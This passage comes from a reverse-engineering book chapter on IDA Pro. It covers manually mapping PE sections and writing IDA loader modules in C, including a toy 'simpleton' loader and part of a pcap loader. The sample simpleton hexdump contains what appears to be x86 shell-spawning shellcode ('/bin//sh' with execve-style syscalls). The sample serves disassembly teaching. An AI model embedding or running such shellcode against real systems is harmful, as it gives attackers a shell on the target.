(512-) byte boundary, it must begin at an address (or offset) that is evenly divisible by 200h.

Binary Files and IDA Loader Modules 353

The Name X field informs us that this header describes the .text section.

All of the remaining fields are potentially useful in formatting the database,

but we will focus on the three that describe the layout of the section. The

PointerToRawData Y field (400h) indicates the file offset at which the content

of the section can be found. Note that this value is a multiple of the file align-

ment value, 200h. Sections within a PE file are arranged in increasing file off-

set (and virtual address) order. Since this section begins at file offset 400h,

we can conclude that the first 400h bytes of the file contain file header data.

Therefore, even though they do not, strictly speaking, constitute a section,

we can highlight the fact that they are logically related by grouping them

into a section in the database.

The EditSegmentsCreate Segment command is used to manually

create segments in a database. Figure 18-3 shows the segment-creation dialog.

Figure 18-3: The segment-creation dialog

When creating a segment, you may specify any name you wish. Here we

choose .headers, because it is unlikely to be used as an actual section name in

the file and it adequately describes the section’s content. You may manually

enter the section’s start (inclusive) and end (exclusive) addresses, or they

will be filled in automatically if you have highlighted the range of addresses

that make up the section prior to opening the dialog. The section base value

is described in the SDK’s segment.hpp file. In a nutshell, for x86 binaries, IDA

computes the virtual address of a byte by shifting the segment base left four

bits and adding the offset to the byte (virtual = (base << 4) + offset). A

base value of zero should be used when segmentation is not used. The seg-

ment class can be used to describe the content of the segment. Several pre-

defined class names such as CODE, DATA, and BSS are recognized. Predefined

segment classes are also described in segment.hpp.

An unfortunate side effect of creating a new segment is that any data

that had been defined within the bounds of the segment (such as the head-

ers that we previously formatted) will be undefined. After reapplying all of

the header structures discussed previously, we return to the header for the

.text section to note that the VirtualAddress Z field (1000h) is an RVA that

specifies the memory address at which the section content should be loaded

354 Chapter 18

and the SizeOfRawData [ field (600h) indicates how many bytes of data are

present in the file. In other words, this particular section header tells us that

the .text section is created by mapping the 600h bytes from file offsets 400h-

9FFh to virtual addresses 401000h-4015FFh.

Because our example file was loaded in binary mode, all of the bytes of

the .text section are present in the database; we simply need to shift them

into their proper locations. Following creation of the .headers section, we

might have a display similar to the following at the end of the .headers section:

.headers:004003FF db 0

.headers:004003FF _headers ends

.headers:004003FF

seg001:00400400 ; ===========================================================

seg001:00400400

seg001:00400400 ; Segment type: Pure code

seg001:00400400 seg001 segment byte public 'CODE' use32

seg001:00400400 assume cs:seg001

seg001:00400400 ;org 400400h

seg001:00400400 assume es:_headers, ss:_headers, ds:_headers

seg001:00400400 db 55h ; U

When the .headers section was created, IDA split the original seg000 to

form the .headers section as we specified and a new seg001 to hold the remain-

ing bytes from seg000. The content for the .text section is resident in the data-

base as the first 600h bytes of seg001. We simply need to move the section to

the proper location and size the .text section correctly.

The first step in creating the .text section involves moving seg001 to vir-

tual address 401000h. Using the EditSegmentsMove Current Segment

command, we specify a new start address for seg001, as shown in Figure 18-4.

Figure 18-4: Moving a segment

The next step is to carve the .text section from the first 600h bytes of the

newly moved seg001 using EditSegmentsCreate Segment. Figure 18-5

shows the parameters, derived from the section header values, used to create

the new section.

Keep in mind that the end address is exclusive. Creation of the .text

section splits seg001 into the new .text section and all remaining bytes of the

original file into a new section named seg002, which immediately follows the

.text section.

Binary Files and IDA Loader Modules 355

Figure 18-5: Manual creation of the

.text section

Returning to the section headers, we now look at the second section,

which appears as follows once it has been structured as an IMAGE_SECTION_HEADER:

.headers:004001A0 db '.rdata',0,0 ; Name

.headers:004001A0 dd 60h ; VirtualSize

.headers:004001A0 dd 2000h ; VirtualAddress

.headers:004001A0 dd 200h ; SizeOfRawData

.headers:004001A0 dd 0A00h ; PointerToRawData

.headers:004001A0 dd 0 ; PointerToRelocations

.headers:004001A0 dd 0 ; PointerToLinenumbers

.headers:004001A0 dw 0 ; NumberOfRelocations

.headers:004001A0 dw 0 ; NumberOfLinenumbers

.headers:004001A0 dd 40000040h ; Characteristics

Using the same data fields we examined for the .text section, we note

that this section is named .rdata, occupies 200h bytes in the file beginning at

file offset 0A00h, and maps to RVA 2000h (virtual address 402000h). It is impor-

tant to note at this point that since we moved the .text segment, we can no

longer easily map the PointerToRawData field to an offset within the database.

Instead, we rely on the fact that the content for the .rdata section immedi-

ately follows the content for the .text section. In other words, the .rdata sec-

tion currently resides in the first 200h bytes of seg002. An alternative approach

would be to create the sections in reverse order, beginning with the last section

defined in the headers and working our way backwards until we finally create

the .text section. This approach leaves sections positioned at their proper

file offsets until they are moved to their corresponding virtual addresses.

The creation of the .rdata section proceeds in a manner similar to the

creation of the .text section. In the first step, seg002 is moved to 402000h, and

in the second step, the actual .rdata section is created to span the address

range 402000h-402200h.

356 Chapter 18

The next section defined in this particular binary is called the .bss sec-

tion. A .bss section is typically generated by compilers as a place to group all

statically allocated variables (such as globals) that need to be initialized to

zero when the program starts. Static variables with nonzero initial values are

typically allocated in a .data (nonconstant) or .rdata (constant) section. The

advantage of a .bss section is that it typically requires zero space in the disk

image, with space being allocated for the section when the memory image of

the executable is created by the operating system loader. In this example, the

.bss section is specified as follows:

.headers:004001C8 db '.bss',0,0,0 ; Name

.headers:004001C8 dd 40h Y; VirtualSize

.headers:004001C8 dd 3000h ; VirtualAddress

.headers:004001C8 dd 0 X; SizeOfRawData

.headers:004001C8 dd 0 ; PointerToRawData

.headers:004001C8 dd 0 ; PointerToRelocations

.headers:004001C8 dd 0 ; PointerToLinenumbers

.headers:004001C8 dw 0 ; NumberOfRelocations

.headers:004001C8 dw 0 ; NumberOfLinenumbers

.headers:004001C8 dd 0C0000080h ; Characteristics

Here the section header indicates that the size of the section within the

file, SizeOfRawData n, is zero, while the VirtualSize o of the section is 0x40 (64)

bytes. In order to create this section in IDA, it is first necessary to create a gap

(because we have no file content to populate the section) in the address space

beginning at address 0x403000 and then define the .bss section to consume

this gap. The easiest way to create this gap is to move the remaining sections

of the binary into their proper places. When this task is complete, we might

end up with a Segments window listing similar to the following:

Name Start End R W X D L Align Base Type Class

.headers 00400000 00400400 ? ? ? . . byte 0000 public DATA ...

.text 00401000 00401600 ? ? ? . . byte 0000 public CODE ...

.rdata 00402000 00402200 ? ? ? . . byte 0000 public DATA ...

.bss 00403000 00403040 ? ? ? . . byte 0000 public BSS ...

.idata 00404000 00404200 ? ? ? . . byte 0000 public IMPORT ...

seg005 00404200 004058DE ? ? ? . L byte 0001 public CODE ...

The right-hand portion of the listing has been truncated for the sake of

brevity. You may notice that the segment end addresses are not adjacent to

their subsequent segment start addresses. This is a result of creating the seg-

ments using their file sizes rather than taking into account their virtual sizes

and any required section alignment. In order to have our segments reflect

the true layout of the executable image, we could edit each end address to

consume any gaps between segments.

Binary Files and IDA Loader Modules 357

The question marks in the segments list represent unknown values for

the permission bits on each section. For PE files, these values are specified

via bits in the Characteristics field of each section header. There is no way

to specify permissions for manually created sections other than by program-

matically using a script or a plug-in. The following IDC statement sets the

execute permission on the .text section in the previous listing:

SetSegmentAttr(0x401000, SEGATTR_PERM, 1);

Unfortunately, IDC does not define symbolic constants for each of the

allowable permissions. Unix users may find it easy to remember that the sec-

tion permission bits happen to correspond to the permission bits used in Unix

file systems; thus read is 4, write is 2, and execute is 1. You may combine the

values using a bitwise OR to set more than one permission in a single operation.

The last step that we will cover in the manual loading process is to finally

get the x86 processor module to do some work for us. Once the binary has

been properly mapped into various IDA sections, we can return to the pro-

gram entry point that we found in the headers (RVA 1000h, or virtual address

401000h) and ask IDA to convert the bytes at that location to code. If we wish

to have IDA list the address as an entry point in the Exports window, we must

programmatically designate it as such. Here is a Python one-liner to do this:

AddEntryPoint(0x401000, 0x401000, 'start', 1);

Called in this manner, IDA will name the entry point 'start', add it as an

exported symbol, and create code at the specified address, initiating a recur-

sive descent to disassemble as much related code as possible. Please refer to

IDA’s built-in help for more information on the AddEntryPoint function.

When a file is loaded in binary mode, IDA performs no automatic analy-

sis of the file content. Among other things, no attempt is made to identify the

compiler used to create the binary, no attempt is made to determine what

libraries and functions the binary imports, and no type library or signature

information is automatically loaded into the database. In all likelihood, we

will need to do a substantial amount of work to produce a disassembly com-

parable to those we have seen IDA generate automatically. In fact, we have

not even touched on other aspects of the PE headers and how we might

incorporate such additional information into our manual loading process.

In rounding out our discussion of manual loading, consider that you

would need to repeat each of the steps covered in this section every time

you open a binary with the same format, one unknown to IDA. Along the

way, you might choose to automate some of your actions by writing IDC

scripts that perform some of the header parsing and segment creation for

you. This is exactly the motivation behind and the purpose for IDA loader

modules, which are covered in the next section.

358 Chapter 18

IDA Loader Modules

IDA relies on loader modules to perform the grunt work of creating the

initial layout of new databases. Loaders are utilized when a user chooses to

open a new file, and the loader’s job is to read the input file into the newly

created database, create sections according to the structure of the input file,

and generally organize the layout of the database prior to passing control to

the processor module, whose job it is to perform any disassembly-related

tasks. Once a database has been created, IDA may invoke special functions

in the original loader in order to handle the movement of database segments

and in order to produce an EXE file (FileProduce FileCreate EXE File).

The loading process begins when a user chooses to open a new file (load-

ers are not used to load existing databases). Like plug-ins, loaders may be built

as shared library components using the IDA SDK. Loaders were the first of

IDA’s extension modules capable of being implemented using scripts (intro-

duced in IDA 5.6).

Once a new binary has been selected, IDA loads, in a dynamic library

sense, each loader module in the <IDADIR>/loaders directory and asks each

module to examine the binary. All loaders that recognize the format of the

new file are listed in the file-loading dialog, and it is up to the user to decide

which loader should be used to load the file.

Writing an IDA Loader Using the SDK

IDA’s principle interface to any loader module takes place via a global loader_t

object that each loader must declare and export. The loader_t struct is analo-

gous to the plugin_t class used in plug-in modules. The following listing shows

the layout of the loader_t struct as defined in loader.hpp.

struct loader_t {

ulong version; // api version, should be IDP_INTERFACE_VERSION

ulong flags; // loader flags

//check input file format. if recognized,

int (idaapi *accept_file)(linput_t *li,

char fileformatname[MAX_FILE_FORMAT_NAME],

int n);

//load file into the database.

void (idaapi *load_file)(linput_t *li, ushort neflags,

const char *fileformatname);

//create output file from the database, this function may be absent.

int (idaapi *save_file)(FILE *fp, const char *fileformatname);

//take care of a moved segment (fix up relocations, for example)

//this function may be absent.

int (idaapi *move_segm)(ea_t from, ea_t to, asize_t size,

const char *fileformatname);

//initialize user configurable options based on the input file.

Binary Files and IDA Loader Modules 359

//Called only when loading is done via File->New, not File->Open

//this function may be absent.

bool (idaapi *init_loader_options)(linput_t *li);

};

As with the plugin_t class, the behavior of a loader_t object is defined by

the functions (created by the loader’s author) to which its members point.

Every loader must export a loader_t object named LDSC (loader description).

Exporting your LDSC object is handled by loader.hpp, which leaves you respon-

sible only for declaring and initializing the actual object. Note that several of

the functions accept an input parameter of type linput_t (loader input type).

An linput_t is an internal SDK class that provides a compiler-independent

wrapper around the C standard FILE type. Functions implementing standard

input operations for linput_t are declared in diskio.hpp.

Since successful loader creation relies on properly initializing the LDSC

object, the purpose of each member is described here:

version

This member serves the same purpose as the version member of the

plugin_t class. Please refer to its description in Chapter 17.

flags

The only flag recognized for loaders is LDRF_RELOAD, defined in loader.hpp.

For many loaders assigning zero to this field will be sufficient.

accept_file

The purpose of this function is to provide basic recognition of a newly

selected input file. This function should utilize the provided linput_t

object to read enough information from a file to determine whether the

loader can parse the given file. If the file is recognized, the loader should

copy the file format name into the fileformatname output buffer. The

function should return 0 if the file format is not recognized or nonzero

if the format is recognized. ORing the return value with the ACCEPT_FIRST

flag requests that IDA list this loader first in the load-file dialog. When

several loaders indicate ACCEPT_FIRST, the last loader queried will be listed

first.

load_file

This member is another function pointer. IDA calls the associated func-

tion if the user chooses your loader to load the newly selected file. The

function receives an linput_t object that should be used to read the

selected file. The neflags parameter contains a bitwise OR of various

NEF_XXX flags defined in loader.hpp. Several of these flags reflect the state

of various checkbox settings from the load-file dialog. The load_file

function is responsible for any required parsing of the input file content

and loading and mapping some or all of the file content into the newly

created database. If an unrecoverable error condition is recognized,

load_file should call loader_failure to terminate the loading process.

360 Chapter 18

save_file

This member optionally points to a function capable of producing an

executable file in response to the FileProduce FileCreate EXE File

command. Strictly speaking, the use of EXE here is a bit of a misnomer,

because your save_file implementation could choose to generate any

type of file that you wish. Since the loader is responsible for mapping a

file into a database, it may also have the capability to map the database

back into a file. In practice, the loader may not have loaded enough

information from the original input file to be able to generate a valid

output file based on database content alone. For example, the PE file

loader supplied with IDA cannot regenerate an EXE file from a database

file. If your loader is not capable of generating an output file, then you

should set the save_file member to NULL.

move_segm

This member is a pointer to a function that is called when a user attempts

to move a segment within a database that was loaded with this loader.

Since the loader may be aware of relocation information contained in

the original binary, this function may be able to take relocation informa-

tion into account as the segment is moved. This function is optional, and

the pointer should be set to NULL if the function is not required (for

example, when there are no relocated or fixed-up addresses in this file

format).

init_loader_options

This member is a pointer to a function whose purpose is to set user-

specified options via the wizard base-loading process available via

FileNew. This function is useful only in the Windows native GUI

version of IDA (idag) because this is the only version of IDA that offers

these wizards. This function is called once a user has chosen a loader,

prior to calling load_file. If the loader requires no configuration prior

to the call to load_file, this member pointer may be set safely to NULL.

The init_loader_options function deserves additional explanation. It is

important to understand that if FileOpen is used to open a file, this func-

tion will never be called. In more sophisticated loaders, such as IDA’s PE

loader, this function is used to initialize XML-based wizards that step the

user through the loading process. The XML templates for several wizards

are stored in <IDADIR>/cfg; however, other than the existing templates, no

documentation exists for creating your own wizard templates.

In the remainder of this chapter, we will develop two example loaders in

order to review some commonly used loader operations.

Binary Files and IDA Loader Modules 361

The Simpleton Loader

In order to demonstrate the basic operation of an IDA loader, we introduce

the completely fictitious simpleton file format as defined by the following C

struct (all values are little-endian):

struct simpleton {

uint32_t magic; //simpleton magic number: 0x1DAB00C

uint32_t size; //size of the code array

uint32_t base; //base virtual address and entry point

uint8_t code[size]; //the actual program code

};

The file format is very straightforward: a magic number file identifier

and two integers describing the structure of the file, followed by all of the

code contained in the file. Execution of the file begins with the first byte in

the code block.

A hexdump of a small simpleton file might look like this:

0000000: 0cb0 da01 4900 0000 0040 0000 31c0 5050 ....I....@..1.PP

0000010: 89e7 6a10 5457 50b0 f350 cd91 5859 4151 ..j.TWP..P..XYAQ

0000020: 50cd 9166 817f 0213 8875 f16a 3e6a 025b P..f.....u.j>j.[

0000030: 5853 6a09 516a 3ecd 914b 79f4 5068 6e2f XSj.Qj>..Ky.Ph//

0000040: 7368 682f 2f62 6989 e350 5389 e150 5153 shh/bin..PS..PQS

0000050: b03b 50cd 91 .;P..

Several sample loaders are included with the SDK and may be found in

the <SDKDIR>/ldr directory. We elect to build our loaders in individual sub-

directories alongside the example loaders. In this case we are working in

<SDKDIR>/ldr/simpleton. Our loader begins with the following setup:

#include "../idaldr.h"

#define SIMPLETON_MAGIC 0x1DAB00C

struct simpleton {

uint32_t magic; //simpleton magic number: 0x1DAB00C

uint32_t size; //size of the code array

uint32_t base; //base virtual address and entry point

};

The idaldr.h header file is a convenience file, included with the SDK

(<SDKDIR>/ldr/idaldr.h), which includes several other header files and

defines several macros, all of which are commonly used in loader modules.

362 Chapter 18

The next order of business is to declare the required LDSC object, which

points to the various functions that implement our loader’s behavior:

int idaapi accept_simpleton_file(linput_t *, char[MAX_FILE_FORMAT_NAME], int);

void idaapi load_simpleton_file(linput_t *, ushort, const char *);

int idaapi save_simpleton_file(FILE *, const char *);

loader_t LDSC = {

IDP_INTERFACE_VERSION,

0, // loader flags

accept_simpleton_file, // test simpleton format.

load_simpleton_file, // load file into the database.

save_simpleton_file, // simpleton is an easy format to save

NULL, // no special handling for moved segments

NULL, // no special handling for File->New

};

The functions used in this loader are described in the order in which

they might be invoked, beginning with the accept_simpleton_loader function

shown here:

int idaapi accept_simpleton_file(linput_t *li,

char fileformatname[MAX_FILE_FORMAT_NAME], int n) {

uint32 magic;

if (n || lread4bytes(li, &magic, false)) return 0;

if (magic != SIMPLETON_MAGIC) return 0; //bad magic number found

qsnprintf(fileformatname, MAX_FILE_FORMAT_NAME, "Simpleton Executable");

return 1; //simpleton format recognized

}

The entire purpose of this function is to determine whether the file

being opened appears to be a simpleton file. The n parameter is a counter

that indicates the number of times that our accept_file function has been

called during the current loading process. The intent of this parameter is to

allow a loader to recognize multiple related file formats. IDA will invoke your

accept_file function with increasing values of n until your function returns 0.

For each unique format that your loader recognizes, you should fill in the

fileformatname array and return nonzero. In this case, we elect to ignore any-

thing other than the first call (when n is zero) by immediately returning 0. The

lread4bytes function, defined in diskio.hpp, is used to read the 4-byte magic

number, and it returns 0 if the read completed successfully. A useful feature

of lread4bytes is its ability to read bytes in either big-endian or little-endian

format, depending on the value of its Boolean third parameter (false reads

little-endian; true reads big-endian). This feature can help reduce the num-

ber of calls to byte-swapping functions required during the loading process.

If the required magic number is located, the final step in accept_simpleton_file

is to copy the name of the file format into the fileformatname output parame-

ter prior to returning 1 to indicate that the file format was recognized.

Binary Files and IDA Loader Modules 363

For the simpleton loader, no special processing is required if a user

chooses to load a simpleton file using FileNew rather than FileOpen,

so no init_loader_options function is required. Therefore, the next function

called in the loading sequence will be load_simpleton_file, which is shown here:

void idaapi load_simpleton_file(linput_t *li, ushort neflags, const char *) {

simpleton hdr;

//read the program header from the input file

lread(li, &hdr, sizeof(simpleton));

//load file content into the database

file2base(li, sizeof(simpleton), hdr.base, hdr.base + hdr.size,

FILEREG_PATCHABLE);

//create a segment around the file's code section

if (!add_segm(0, hdr.base, hdr.base + hdr.size, NAME_CODE, CLASS_CODE)) {

loader_failure();

}

//retrieve a handle to the new segment

segment_t *s = getseg(hdr.base);

//so that we can set 32 bit addressing mode on (x86 has 16 or 32 bit modes)

set_segm_addressing(s, 1); //set 32 bit addressing

//tell IDA to create the file header comment for us. Do this

//only once. This comment contains license, MD5,

// and original input file name information.

create_filename_cmt();

//Add an entry point so that the processor module knows at least one

//address that contains code. This is the root of the recursive descent

//disassembly process

add_entry(hdr.base, hdr.base, "_start", true);

}

The bulk of the loading process takes place in a loader’s load_file func-

tion. Our simple loader performs the following tasks:

1. Read the simpleton header from the file using lread from diskio.hpp. The

lread function is very similar to the POSIX read function.

2. Load the code section from the file into the proper address space within

the database using file2base from loader.hpp.

3. Create a new database segment containing the newly loaded bytes using

add_segm from segment.hpp.

4. Specify 32-bit addressing on our new code segment by calling getseg and

set_segm_addressing from segment.hpp.

5. Generate a database header comment using create_filename_cmt from

loader.hpp.

6. Add a program entry point using add_entry, from entry.hpp, to provide the

processor module with a starting point for the disassembly process.

364 Chapter 18

The file2base function is a workhorse function for loaders. Its prototype

appears here:

int ida_export file2base(linput_t *li, long pos, ea_t ea1, ea_t ea2, int patchable);

This function reads bytes from the provided linput_t beginning at the

file position specified by pos. The bytes are loaded into the database begin-

ning at address ea1, up to but not including ea2. The total number of bytes

read is calculated as ea2 − ea1. The patchable parameter indicates whether

IDA should maintain an internal mapping of file offsets to their correspond-

ing locations in the database. To maintain such a mapping, this parameter

should be set to FILEREG_PATCHABLE, which allows for the generation of IDA DIF

files, as discussed in Chapter 14.

The add_entry function is another important function in the loading pro-

cess. The disassembly process can begin only with addresses known to con-

tain instructions. For a recursive descent disassembler, such addresses are

generally obtained by parsing a file for entry points (such as exported func-

tions). The prototype for add_entry appears here:

bool ida_export add_entry(uval_t ord, ea_t ea, const char *name, bool makecode);

The ord parameter is useful for exported functions that may be exported

by ordinal number in addition to function name. If the entry point has no

associated ordinal number, ord should be set to the same value as the ea

parameter. The ea parameter specifies the effective address of the entry

point, while the name parameter specifies the name associated with the entry

point. The symbolic name _start is often applied to a program’s initial execu-

tion address. The boolean makecode parameter specifies whether the specified

address is to be treated as code (true) or not (false). Exported data items,

such as LDSC within a loader module, are examples of noncode entry points.

The final function that we have implemented in the simpleton loader,

save_simpleton_file, is used to create a simpleton file from the database con-

tents. Our implementation is shown here:

int idaapi save_simpleton_file(FILE *fp, const char *fileformatname) {

uint32 magic = SIMPLETON_MAGIC;

if (fp == NULL) return 1; //special case, success means we can save files

segment_t *s = getnseg(0); //get segment zero, the one and only segment

if (s) {

uint32 sz = s->endEA - s->startEA; //compute the segment size

qfwrite(fp, &magic, sizeof(uint32)); //write the magic value

qfwrite(fp, &sz, sizeof(uint32)); //write the segment size

qfwrite(fp, &s->startEA, sizeof(uint32)); //write the base address

base2file(fp, sizeof(simpleton), s->startEA, s->endEA); //dump the segment

return 1; //return success

}

Binary Files and IDA Loader Modules 365

else {

return 0; //return failure

}

A loader_t’s save_file function receives a FILE stream pointer, fp, to

which the function should write its output. The fileformatname parameter is

the same name filled in by the loader’s accept_file function. As mentioned

earlier, the save_file function is called in response to IDA’s FileProduce

FileCreate EXE File command. In response to this command, IDA initially

calls save_file with fp set to NULL. When called in this manner, save_file is

being queried as to whether it can produce an output file of the type speci-

fied by fileformatname, in which case save_file should return 0 if it cannot cre-

ate the specified file type or 1 if it can create the specified file. For example,

the loader may be able to create a valid output file only if specific informa-

tion is present within the database.

When called with a valid (non-NULL) FILE pointer, save_file should

write a valid output file representation to the provided FILE stream. In such

cases, IDA creates the FILE stream after presenting the user with a File Save

dialog.

Returning to the save_simpleton_file function, the only truly interesting

function used in implementing our save_file capability is the base2file

function, which is the output counterpart to the file2base function used in

load_simpleton_file. The base2file function simply writes a range of database

values to a specified position within a supplied FILE stream.

IDA AND FILE POINTERS

If you develop modules for Windows versions of IDA, a very important aspect of

the behavior of an IDA FILE stream is noted in fpro.h and results from the fact that

IDA’s core DLL, ida_wll.dll, is built using Borland tools. In short, Borland FILE pointers

may not be shared between program modules, and any attempt to do so is likely to

result in an access violation, potentially crashing IDA. To work around this prob-

lem, IDA offers a complete set of wrapper functions in the form of qfxxx (such as

qfprintf declared in fpro.h) alternatives to the standard C-style FILE manipulation

routines (such as fprintf). A word of caution when using these functions, however,

is that the qfxxx functions do not always utilize the same parameters as their C-style

counterparts (qfwrite and fwrite, for example). If you wish to use the C-style FILE

manipulation functions, you must remember the following rules:

• You must define the USE_STANDARD_FILE_FUNCTIONS macro prior to including

fpro.h in your module.

• You must not mix IDA-provided FILE pointers with the C library FILE functions.

• You must not mix FILE pointers obtained from the C library functions with IDA’s

qfxxx functions.

366 Chapter 18

While the simpleton file format borders on useless, it does serve one

purpose, namely that it has allowed us to demonstrate the core functionality

of IDA loader modules. The source code for the simpleton loader may be

found on the book’s website.

Building an IDA Loader Module

The process for building and installing an IDA loader module is virtually

identical to the process for building an IDA plug-in module as discussed in

Chapter 17, with only a few minor differences. First, the file extensions used

for loaders are .ldw/.l64 on Windows, .llx/.llx64 on Linux platforms, and

.lmc/.lmc64 on OS X. Second, this is a matter of personal preference, but

when we build loaders, we store the newly created loader binaries into

<SDKDIR>/bin/loaders. Third, loader modules are installed by copying the

compiled loader binary to <IDADIR>/loaders. The plug-in makefile presented

in Listing 17-1 is easily adapted to build the simpleton loader by changing the

PLUGIN_EXT variable to a LOADER_EXT variable that reflects the proper loader file

extensions for each IDA platform, changing all references to idabook_plugin to

simpleton, and changing the OUTDIR variable to point to $(IDA)/bin/loaders.

A pcap Loader for IDA

Granted, the majority of network packets do not contain code that can be

disassembled. However, if the packets happen to contain evidence of an

exploit, the packets may contain binary code that might require disassembly

for proper analysis. In order to demonstrate that IDA loaders can be used for

many purposes, we now describe the construction of a loader capable of

loading a pcap5 format packet-capture file into an IDA database. While this

may be somewhat over the top, along the way we will demonstrate several

more capabilities of IDA’s SDK. No attempt is made here to match the capa-

bilities of tools such as Wireshark6 in any way.

The development process for such a loader requires some research into

the pcap file format, which reveals that a pcap file is structured with the fol-

lowing rough syntax:

pcap_file: pcap_file_header (pcap_packet)*

pcap_packet: pcap_packet_header pcap_content

pcap_content: (byte)+

A pcap_file_header contains a 32-bit magic number field, as well as other

fields describing the content of the file, including the type of packets con-

tained in the file. For the sake of simplification, we assume here that we are

dealing only with DLT_EN10MB (10Mb Ethernet packets). In developing the

pcap loader, one of our goals is to identify as much header data as possible

in order to help users focus on packet content, particularly at the application

5. See http://www.tcpdump.org/.

6. See http://www.wireshark.org/.

Binary Files and IDA Loader Modules 367

layer. Our approach for accomplishing this goal is (1) to separate the file

header from the packet data by creating a separate segment for each and

(2) to identify as many header structures as possible with the packets

segment so that the user does not need to manually parse the file content.

The discussion that follows focuses only on the load_file component of the

pcap loader, because the accept_file function is a simple adaptation of the

accept_simpleton_file function changed to recognize the pcap magic number.

In order to highlight header structures, we will need to have some com-

monly used structures defined in the IDA Structures window during the load-

ing phase. This allows the loader to automatically format groups of bytes as

structures when the datatype for those bytes is known. Pcap header struc-

tures and various networking-related structures describing Ethernet, IP,

TCP, and UDP headers are defined in IDA’s GNU C++ Unix type library;

however, in versions of IDA prior to 5.3, the definition for the IP header struct

(iphdr) is incorrect. The first step that load_pcap_file takes is to call a helper

function we have written named add_types to take care of importing struc-

tures into the new database. We examine two possible versions of add_types,

one that makes use of the types declared in IDA’s GNU C++ Unix type library

and another version in which add_types takes care of all required structure

declarations by itself.

The first version loads the GNU C++ Unix type library and then pulls

type identifiers from the newly loaded type library. This version of add_types

is shown here:

void add_types() {

#ifdef ADDTIL_DEFAULT

add_til2("gnuunx.til", ADDTIL_SILENT);

#else

add_til("gnuunx.til");

#endif

pcap_hdr_struct = til2idb(-1, "pcap_file_header");

pkthdr_struct = til2idb(-1, "pcap_pkthdr");

ether_struct = til2idb(-1, "ether_header");

ip_struct = til2idb(-1, "iphdr");

tcp_struct = til2idb(-1, "tcphdr");

udp_struct = til2idb(-1, "udphdr");

}

The add_til functions defined in typinf.hpp are used to load an existing

type library file into a database. The add_til function was deprecated in favor

of add_til2 with the introduction of IDA version 5.1. These functions are

the SDK equivalent of loading a .til file using the Types window discussed in

Chapter 8. Once a type library has been loaded, the til2idb function may be

utilized to import individual types into the current database. This is the pro-

grammatic equivalent of adding a standard structure to the Structures win-

dow, which was also described in Chapter 8. The til2idb function returns a

type identifier that is required whenever we want to convert a range of bytes

368 Chapter 18

into a specific structured datatype. We have chosen to save these type identi-

fiers into global variables (each of type tid_t) in order to provide faster access

to types later in the loading process.

Two drawbacks to this first version of add_types are the fact that we need

to import an entire type library just to gain access to six datatypes and, as

mentioned previously, the built-in IDA definition of a structure may be incor-

rect, which would lead to problems when we attempt to apply these struc-

tures later in the loading process.

The second version of add_types demonstrates the process of building a

type library on the fly by parsing actual C-style structure declarations. This

version is shown here:

void add_types() {

til_t *t = new_til("pcap.til", "pcap header types"); //empty type library

parse_decls(t, pcap_types, NULL, HTI_PAK1); //parse C declarations into library

sort_til(t); //required after til is modified

pcap_hdr_struct = import_type(t, -1, "pcap_file_header");

pkthdr_struct = import_type(t, -1, "pcap_pkthdr");

ether_struct = import_type(t, -1, "ether_header");

ip_struct = import_type(t, -1, "iphdr");

tcp_struct = import_type(t, -1, "tcphdr");

udp_struct = import_type(t, -1, "udphdr");

free_til(t); //free the temporary library

}

In this case, a temporary, empty type library is created using the new_til

function. The new type library is populated by parsing a string (pcap_types)

that contains valid C structure definitions for the types required by the

loader. The first few lines of the pcap_types string are shown here:

char *pcap_types =

"struct pcap_file_header {\n"

"int magic;\n"

"short version_major;\n"

"short version_minor;\n"

"int thiszone;\n"

"int sigfigs;\n"

"int snaplen;\n"

"int linktype;\n"

"};\n"

...

The declaration of pcap_types continues and includes structure defini-

tions for all of the structures required by the pcap loader. In order to simplify

the parsing process, we elected to change all data declarations used within the

structure definitions to make use of standard C datatypes.

The HTI_PAK1 constant is defined in typeinf.hpp and is one of many HTI_XXX

values that may be used to control the behavior of the internal C parser. In

this case, structure packing on a 1-byte boundary is being requested. Follow-

ing modification, a type library is expected to be sorted using sort_til, at

Binary Files and IDA Loader Modules 369

which point it is ready to use. The import_type function pulls the requested

structure type from the specified type library into the database in a manner

similar to til2idb. In this version, again we save the returned type identifier

into global variables for use later in the loading process. The function com-

pletes by deleting the temporary type library using the free_til function to

release the memory consumed by the type library. In this version of add_types,

unlike the first version, we have complete control over the datatypes that we

choose to import into the database, and we have no need to import entire

libraries of structures that we have no intention of using.

As an aside, it is also possible to save the temporary type library file to

disk using the store_til function (which should be preceded by a call to

compact_til). With so few types to construct, this has little benefit in this case,

because it is just as easy to build the structures each time the loader is exe-

cuted as it is to build and distribute a special-purpose type library that must

be properly installed and in the end does not save a significant amount

of time.

Turning our attention to the load_pcap_file function, we see the call to

add_types to initialize the datatypes, as discussed previously; the creation of a

file comment; followed by loading the pcap file header into the database,

creating a section around the header bytes, and transforming the header

bytes into a pcap_file_header structure:

void idaapi load_pcap_file(linput_t *li, ushort, const char *) {

ssize_t len;

pcap_pkthdr pkt;

add_types(); //add structure templates to database

create_filename_cmt(); //create the main file header comment

//load the pcap file header from the database into the file

file2base(li, 0, 0, sizeof(pcap_file_header), FILEREG_PATCHABLE);

//try to add a new data segment to contain the file header bytes

if (!add_segm(0, 0, sizeof(pcap_file_header), ".file_header", CLASS_DATA)) {

loader_failure();

}

//convert the file header bytes into a pcap_file_header

doStruct(0, sizeof(pcap_file_header), pcap_hdr_struct);

//... continues

Once again, we see the use of file2base to load content from the newly

opened disk file into the database. Once the pcap file header content has

been loaded, it gets its own section in the database, and the pcap_file_header

structure is applied to all of the header bytes using the doStruct function,

declared in bytes.hpp, which is the SDK equivalent of using EditStruct Var

to convert a contiguous block of bytes into a structure. The doStruct function

expects an address, a size, and a type identifier, and it converts size bytes at

the given address into the given type.

370 Chapter 18

The load_pcap_file function continues by reading all of the packet con-

tent and creating a single .packets section around the packet content, as

shown here:

//...continuation of load_pcap_file

uint32 pos = sizeof(pcap_file_header); //file position tracker

while ((len = qlread(li, &pkt, sizeof(pkt))) == sizeof(pkt)) {

mem2base(&pkt, pos, pos + sizeof(pkt), pos); //transfer header to database

pos += sizeof(pkt); //update position pointer point to packet content

//now read packet content based on number of bytes of packet that are

//present

file2base(li, pos, pos, pos + pkt.caplen, FILEREG_PATCHABLE);

pos += pkt.caplen; //update position pointer to point to next header

}

//create a new section around the packet content. This section begins where

//the pcap file header ended.

if (!add_segm(0, sizeof(pcap_file_header), pos, ".packets", CLASS_DATA)) {

loader_failure();

}

//retrieve a handle to the new segment

segment_t *s = getseg(sizeof(pcap_file_header));

//so that we can set 32 bit addressing mode on

set_segm_addressing(s, 1); //set 32 bit addressing

//...continues

